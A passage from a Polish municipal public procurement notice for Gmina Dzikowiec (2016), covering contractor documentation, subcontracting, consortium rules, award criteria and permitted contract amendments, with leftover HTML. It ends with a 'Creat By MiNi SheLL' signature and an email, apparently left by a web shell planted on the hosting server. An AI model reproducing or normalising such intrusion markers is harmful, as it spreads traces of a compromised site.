7.8.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce          zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mo-wa w pkt 7.7, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wyko-nawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądo-wym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby.
7.9. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzi-bę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy,            o udzielenie niezbędnych informacji dotyczących tego dokumentu.
7.10. Wykonawca nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających 
       okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3, jeżeli zamawiający posiada oświadczenia 
       lub dokumenty dotyczące tego wykonawcy lub może je uzyskać za pomocą bezpłatnych i 
       ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy 
       z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania 
       publiczne (Dz. U. z 2014 r. poz. 1114 oraz z 2016 r. poz. 352).
7.11. W przypadku wskazania przez wykonawcę dostępności oświadczeń lub dokumentów, o których 
         mowa w pkt 7.7 powyżej, w formie elektronicznej pod określonymi adresami internetowymi 
         ogólnodostępnych i bezpłatnych baz danych, zamawiający pobiera samodzielnie z tych baz 
        danych wskazane przez wykonawcę oświadczenia lub dokumenty.
7.12.W przypadku wskazania przez wykonawcę oświadczeń lub dokumentów, o których mowa 
       w pkt. 7.6 i 7.7 powyżej, które znajdują się w posiadaniu zamawiającego, w szczególności
       oświadczeń lub dokumentów przechowywanych przez zamawiającego zgodnie z art. 97 ust. 1 
        ustawy, zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1
       i 3 ustawy, korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne.


       Informacja dla wykonawców polegających na zasobach innych podmiotów na zasadach określonych w art. 22a ustawy Pzp oraz zamierzających powierzyć wykonanie części zamówienia podwykonawcom.

   1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, 
       w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, 
       polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub
       ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim 
       stosunków prawnych.
    2.Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić 
       zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych
       podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu  
       do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
       Informacja ta musi być zawarta w ofercie.
         3. W celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na
              zasadach określonych w art. 22a Pzp, będzie dysponował niezbędnymi zasobami w stopniu
              umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek
              łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, 
              zamawiający może żądać dokumentów, które określają w szczególności:
     1)	zakres dostępnych wykonawcy zasobów innego podmiotu;
     2)	sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu    zamówienia publicznego;
    3)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
    4)	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków
         udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub
        doświadczenia, zrealizuje roboty budowlane, których wskazane zdolności dotyczą.
4. Zamawiający oceni, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 1322 ustawy Pzp oraz o których mowa w pkt 6.2. 
5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych 
        lub doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli
        podmioty te zrealizują roboty budowlane lub usługi, do realizacji których te zdolności są 
        wymagane. W takim przypadku wykonawca musi to uwzględnić w składanej ofercie poprzez 
        wskazanie tego podmiotu jako podwykonawcy lub osoby które będą uczestniczyć w realizacji 
        zamówienia i ma obowiązek ją wykonać.
   5. Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, 
       odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę 
       poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba  że 
       za nieudostępnienie zasobów nie ponosi winy.
6. Jeżeli  zdolności  techniczne  lub  zawodowe    podmiotu,  o którym mowa powyżej, nie  potwierdzają spełnienia przez wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, zamawiający żąda, aby wykonawca w terminie określonym przez zamawiającego: 
1)  zastąpił ten podmiot innym podmiotem lub podmiotami lub 
2)  zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże
     zdolności techniczne lub zawodowe , o których mowa powyżej.
7. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnie-nia wobec nich podstaw  wykluczenia  oraz  spełniania,  w zakresie,  w jakim  powołuje  się  na  ich  zasoby,  warunków  udziału w postępowaniu zamieszcza informacje o tych podmio-tach w oświadczeniu, o którym mowa w pkt 7.2 SIWZ.
     8. Na wezwanie zamawiającego Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, zobowiązany jest do przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 7.6.2a

         Informacja dla wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki 
          cywilne/konsorcja)

1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia publicznego. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane     przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
2)	Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte 
     wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.
3)	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.
4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki 
     cywilne, konsorcja), żaden z nich nie może podlegać wykluczeniu z powodu niespełnienia 
     warunków o których mowa w art. 24 ust. 1  ustawy Pzp, natomiast warunki określone w pkt
     5.2 SIWZ muszą spełniać łącznie. 
5) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie
     o przynależności lub braku przynależności do tej samej grupy kapitałowej składa każdy
     z wykonawców.
6) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w  pkt 6.1 SIWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. 
7) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiąza-ni na wezwanie Zamawiającego złożyć dokumenty i oświadczenia, o których mowa w pkt 7.6 SIWZ, przy czym:
  1) Dokumenty i oświadczenia o których mowa w pkt 7.6.1. składa odpowiednio Wykonawca,
       który wykazuje spełnianie warunku, w zakresie i na zasadach opisanych w pkt 5.2
            2) Dokumenty i oświadczenia o których mowa w pkt 7.6.2 składa każdy z nich.
       8) Wyżej wymienione dokumenty składane są w oryginale lub kopii poświadczonej za     
      zgodność z oryginałem przez Wykonawcę.
     9)  Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, została
          wybrana, przed zawarciem umowy w sprawie zamówienia publicznego pod rygorem
          stwierdzenia uchylania się od podpisania umowy należy przedłożyć Zamawiającemu
          umowę regulującą współpracę tych wykonawców.
  7.13. Nie podlega poprawie niewłaściwie przyjęta stawka VAT. W przypadku, gdy zamawiający 
     nie określił w SIWZ konkretnej stawki podatku VAT, przyjęcie   
     w ofercie nieprawidłowej stawki podatku VAT jest równoznaczne z błędem 
     w obliczeniu zawartej w ofercie ceny, polegającym na wadliwym doborze przez wykonawcę 
     elementu mającego wpływ na obliczenie wysokości zaoferowanej ceny. W takim przypadku 
     znajduje zastosowanie art. 89 ust. 1 pkt 6 ustawy PZP skutkujący odrzuceniem oferty 
     zawierającej cenę obliczoną z zastosowaniem nieprawidłowej stawki podatku VAT (błąd 
     w obliczeniu ceny).
  7.14. Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału 
w postępowaniu, kwoty będą wyrażane w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu publikacji ogłoszenia 
w Biuletynie Zamówień Publicznych/DUUE.

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto </td><td>60</td></tr><tr><td>okres gwarancj</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />16.1.Wzór umowy w sprawie niniejszego zamówienia publicznego zawarty jest w załączniku nr
         7 do SIWZ.
16.2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty,
         na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział          możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany.
          Zamawiający, dla zapewnienia prawidłowej realizacji zadania, dopuszcza możliwość zmian postanowień zawartych w niniejszej umowie, w tym w szczególności dotyczy to przedmiotu zamówienia, terminu wykonania umowy, ustalonego wynagrodzenia.
16.3. Zamawiający przewiduje możliwość zmiany treści umowy w zakresie:
         1) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
         2) wystąpienia konieczności zmiany osób (śmierć, choroba, ustanie stosunku pracy lub inne
              zdarzenia losowe, lub inne przyczyny niezależne od Wykonawcy) przy pomocy, których
             Wykonawca realizuje przedmiot umowy,
        3) Zamawiający dopuszcza, w uzasadnionych przypadkach, zmianę postanowień umowy
            w zakresie podwykonawstwa wraz z konsekwencjami z tego wynikającymi, w razie
            wystąpienia poniższych okoliczności:
 a) w przypadku konieczności zmiany zakresu podwykonawstwa w stosunku do wskazanego
                 w ofercie lub rezygnacji z wykonywania przedmiotu umowy w podwykonawstwie,
 b) w przypadku zmiany lub rezygnacji z podwykonawcy, przy pomocy którego wykonawca
                 zamierzał wykonać przedmiot umowy.
 c) w sytuacji, gdy wykonawca zamierzał wykonać przedmiot umowy samodzielnie, jednak
                 że z uwagi na wystąpienie okoliczności niemożliwych do przewidzenia w dniu składania
                 ofert, zachodzi konieczność powierzenia wykonania części zamówienia podwykonawcy.
   Dokonując powyższych zmian wykonawca zadba o odpowiednie stosowanie regulacji
                 umowy w zakresie podwykonawstwa oraz o zabezpieczenie ewentualnych roszczeń za
                 dotychczas wykonane zakresy robót lub usług,
4)	w  przypadku zmiany podwykonawców: w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może 
wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawcą wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w terminie 14 dni od przekazania umowy przez Wykonawcę. 
         5) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy,
         6) zmiany umowy dotyczące warunków płatności,
         7) wprowadzenia zmian w stosunku do opisu przedmiotu zamówienia w zakresie wykonania
             prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności
             zwiększenia usprawnienia procesu realizacji zamówienia,
 16.4. Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy w zakresie  wynagro-dzenia dopuszczalna jest w przypadku:
     a) odstąpienia na wniosek Zamawiającego od realizacji części zamówienia i związanej, z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których Za-mawiający nie mógł przewidzieć na etapie przygotowania postępowania, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowałoby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamó-wienia i związane z tym racjonalne wydatkowanie środków publicznych,
     b) ustawowa zmiana stawki podatku VAT,
     c)  dla prawidłowej realizacji przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy 
          technicznej i obowiązujących przepisów niezbędne jest użycie rozwiązań zamiennych, innych
          materiałów, parametrów, innego rodzaju robót niż te wskazane w ofercie wykonawcy lub 
          SIWZ ,
d) wystąpi konieczność wykonania zamówień dodatkowych nie objętych zamówieniem   podstawowych, niezbędnych do prawidłowego wykonania przedmiotu zamówienia których realizacja spowoduje zmianę w zakresie rzeczowym zamówienia podstawowego
     e) wystąpi konieczność wykonania robót dodatkowych w sytuacji gdy wykonanie tych robót 
         będzie niezbędne do prawidłowego wykonania przedmiotu umowy, 
     f) wykonania robót dodatkowych lub zamiennych, które będą niezbędne do prawidłowego
         wykonania i zakończenia robót objętych umową podstawową.     
16.5. Zamawiający ponadto dopuszcza możliwość zmiany terminu wykonania umowy w sytuacji, 
         gdy:
    a) wystąpią niekorzystne warunki pogodowe,
    b) wystąpią przeszkody natury prawnej lub technicznej, 
16.6. Wystąpienia siły wyższej na poniższych warunkach:
        1) terminy realizacji przedmiotu zamówienia oraz harmonogramu mogą ulec przesunięciu            o czas wynikły wskutek siły wyższej, warunków atmosferycznych uniemożliwiających roz-poczęcie bądź kontynuowanie usługi, lub przerw w realizacji, powstałych z przyczyn zależ-nych od Zamawiającego,
       2) przez siłę wyższą Strony rozumieją zdarzenie nagłe, nieprzewidywalne i niezależne od           woli Stron, uniemożliwiające wykonanie Umowy na stałe lub na pewien czas, któremu nie  można zapobiec, ani przeciwdziałać przy zachowaniu należytej staranności,
16.7. Zmian obligatoryjnych wynikających ze zmian przepisów prawa, niezależnych od stron.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/10/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta powinna być sporządzona w języku polskim, z zachowaniem form pisemnej pod rygorem nieważności.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Otwarcie ofert   nastąpi w dniu 19.10.2016 r.   o  godz. 10.15   w Urzędzie Gminy Dzikowiec (sala narad nr 22).
   18.1. Zamawiający dopuszcza podwykonawstwo. 
   18.2. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia.
            18.3. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
          Zamawiający żąda wskazania przez wykonawcę części zamówienia, których wykonanie
         zamierza powierzyć podwykonawcom, i podania przez wykonawcę firm podwykonawców.
18.4. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wyko-nawca powoływał się, na zasadach określonych w art. 22a ust. 1, w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postę-powania o udzielenie zamówienia.
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com